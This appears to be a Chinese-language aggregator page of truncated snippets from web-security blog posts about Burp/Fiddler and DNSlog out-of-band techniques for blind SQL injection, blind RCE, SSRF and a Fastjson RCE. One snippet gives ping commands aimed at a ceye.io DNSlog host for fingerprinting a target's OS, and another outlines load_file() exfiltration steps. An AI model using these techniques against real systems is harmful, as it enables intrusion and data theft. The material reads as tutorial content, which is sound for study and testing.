簡介 還簡介啥，哪個做web安全的不用burp。 Fiddler+burp抓取微信明文報文 參考鏈接： Fiddler下載：https://www.telerik.com/fiddler#download-trial-file https://zhuanlan.zhihu.com ...

原理: 首先需要有一個可以配置的域名，比如：ceye.io，然后通過代理商設置域名 ceye.io 的 nameserver 為自己的服務器 A，然后再服務器 A 上配置好 DNS Serve ...

目錄 0x01 什么是DNSlog注入 0x02 DNS注入原理 0x03 使用場景和條件 0x04 配合sql注入 0x05 配合其他攻擊 0x01 什么是DNSlog注入 DNSlog注入，也叫DNS帶外查詢，它是屬於帶外通信的一種(Out ...

判斷linux還是windows 1.先測試ping.exe test.ob3.ceye.io 是否接收到dnslog解析,如果可以則說明是windows 2.再測試ping -c 1 test.ob3.ceye.io，如果可以執行說明是linux。 需要注意的是，windows執行 ...

0x00 寫這篇博客的原因是wb在線的面試中無回顯rce的問題在這里填了這個坑 0x10 下面是幾個常用的dnslog平台 0x20 dnslog平台的作用 現在很多漏洞都沒有辦法去回顯，可是我們的payload已經執行，所以我們需要使用一些第三方的dnslog平台 ...

一、dnslog利用場景 主要針對無回顯的情況。 Sql-Blind RCE SSRF RFI（Remote File Inclusion） 二、原理 將dnslog平台中的特有字段payload帶入目標發起dns請求，通過dns解析將請求后的關鍵信息組合成新 ...

目錄 payload 利用java.net.Inet[4|6]Address 參考 Fastjson <= 1.2.47 遠程命令執行漏洞利用工具及 ...

step1： 通過DNSlog盲注需要用到load_file()函數。show variables like '%secure%' 查看load_file()可以讀取的磁盤。 1、當secure_file_priv為空，就可以讀取磁盤的目錄。 2、當secure_file_priv為G ...